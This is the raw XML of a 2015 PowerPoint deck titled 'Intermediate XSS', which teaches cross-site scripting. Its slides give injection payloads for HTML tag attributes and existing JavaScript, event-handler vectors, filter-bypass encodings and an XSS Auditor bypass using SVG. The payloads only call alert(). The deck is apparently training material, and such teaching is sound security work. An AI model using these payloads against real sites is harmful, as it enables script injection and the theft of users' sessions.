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9F71-1CB9-2744-95BD-AA5787AA056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9DCC-C577-5348-84F4-0CF22C78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XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3schools.com/tags/ref_eventattribute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800" y="2116180"/>
            <a:ext cx="6812679" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>██╗███╗   ██╗████████╗███████╗██████╗ ███╗   ███╗███████╗██████╗ ██╗ █████╗ ████████╗███████╗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██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗████╗ ████║██╔════╝██╔══██╗██║██╔══██╗╚══██╔══╝██╔════╝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██║██╔██╗ ██║   ██║   █████╗  ██████╔╝██╔████╔██║█████╗  ██║  ██║██║███████║   ██║   █████╗  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██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗██║╚██╔╝██║██╔══╝  ██║  ██║██║██╔══██║   ██║   ██╔══╝  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██║██║ ╚████║   ██║   ███████╗██║  ██║██║ ╚═╝ ██║███████╗██████╔╝██║██║  ██║   ██║   ███████╗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╚═╝╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                                                                                                 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br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6495" y="3441647"/>
            <a:ext cx="34709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██╗  ██╗███████╗███████╗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╚██╗██╔╝██╔════╝██╔════╝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╚███╔╝ ███████╗███████╗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██╔██╗ ╚════██║╚════██║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██╔╝ ██╗███████║███████║                                                                      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╚═╝  ╚═╝╚══════╝╚══════╝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https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet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http://www.w3schools.com/tags/ref_eventattributes.asp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into HTML Tag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Sometimes user input ends up inside tags like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>image.jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>” alt=“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[user input]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>In this case, if you want to script to execute you need to break out of the tag so you can start a new one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“&gt;&lt;script&gt;alert(0)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Injected tag: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>image.jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>” alt=“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“&gt;&lt;script&gt;alert(0)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>image.jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>” alt=““&gt; &lt;script&gt;alert(0)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>What if you cant use the “&lt;“ or “&gt;” symbols?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>You wont be able to break out of the tag, but you may be able to break out of the parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“alert(0)” blah=“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Injected tag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com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image.jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>” alt=“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“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onmouseover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=“alert(0)” blah=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>image.jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>” alt=““ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“alert(0)” blah=“”&gt;</a:t>
            </a:r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9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into Existing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Sometimes user input ends up inside existing JavaScript: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&lt;script&gt;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$(document).ready( function()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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>window.location.hash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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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dogs = ‘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[user input]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’;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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(”dogs").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = dogs;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});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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>In this case, if you want your script to execute you need to insert valid JavaScript so the existing script executes without errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>‘; alert(0); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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 a = ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Injected line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> dogs = ‘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‘; alert(0);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 a = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>How else could you insert alert(0);?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600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84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Beyond the Script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ways to get script execution besides using the script tag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 domain will be different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each has their own benefits, quirks, and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nload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – fires after the page has finished loading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nerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – fires when an error occurs while loading an external file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nmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – fires when the mouse pointer moves over the element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nbeforeunload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – script to be run when the document is about to be unloaded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nkeydown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – fires when a user is pressing a key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Filter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spaces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 smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="alert(0)"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=0&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use other whitespace characters like tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain characters blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User JS to convert characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(88,83,83)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let the parsing engine convert characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Figure out if the character is being interpreted by the JS engine or HTML engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This affects which way you can represent characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[code point]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>\u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[code point]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[code point]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>  &amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[code point]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9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Practice!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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS Auditor Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script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  <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x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"&lt;/script&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;alert(1)+&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;"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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS through SVG - demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS through GIFs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>- demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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92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Shortening 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external script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host it somewhere and import it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’re building a payload make the variable names short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xploit=   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>   e=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>If going through a restricted form change the size parameter in the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2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695</Words>
  <Application>Microsoft Macintosh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██╗███╗   ██╗████████╗███████╗██████╗ ███╗   ███╗███████╗██████╗ ██╗ █████╗ ████████╗███████╗     ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗████╗ ████║██╔════╝██╔══██╗██║██╔══██╗╚══██╔══╝██╔════╝     ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝██╔████╔██║█████╗  ██║  ██║██║███████║   ██║   █████╗       ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗██║╚██╔╝██║██╔══╝  ██║  ██║██║██╔══██║   ██║   ██╔══╝       ██║██║ ╚████║   ██║   ███████╗██║  ██║██║ ╚═╝ ██║███████╗██████╔╝██║██║  ██║   ██║   ███████╗     ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝                                                                                                       </vt:lpstr>
      <vt:lpstr>Injecting into HTML Tag Parameters</vt:lpstr>
      <vt:lpstr>Injecting into Existing JavaScript</vt:lpstr>
      <vt:lpstr>Life Beyond the Script Tag</vt:lpstr>
      <vt:lpstr>HTML Event Attributes</vt:lpstr>
      <vt:lpstr>XSS Filter Bypass</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Other Weirdness</vt:lpstr>
      <vt:lpstr>Shortening Payloads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██╗███╗   ██╗████████╗███████╗██████╗ ███╗   ███╗███████╗██████╗ ██╗ █████╗ ████████╗███████╗     ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗████╗ ████║██╔════╝██╔══██╗██║██╔══██╗╚══██╔══╝██╔════╝     ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝██╔████╔██║█████╗  ██║  ██║██║███████║   ██║   █████╗       ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗██║╚██╔╝██║██╔══╝  ██║  ██║██║██╔══██║   ██║   ██╔══╝       ██║██║ ╚████║   ██║   ███████╗██║  ██║██║ ╚═╝ ██║███████╗██████╔╝██║██║  ██║   ██║   ███████╗     ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝                                                                                                       </dc:title>
  <dc:creator>_</dc:creator>
  <cp:lastModifiedBy>_</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-04-09T19:09:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-04-10T00:39:03Z</dcterms:modified>
</cp:coreProperties>
</file>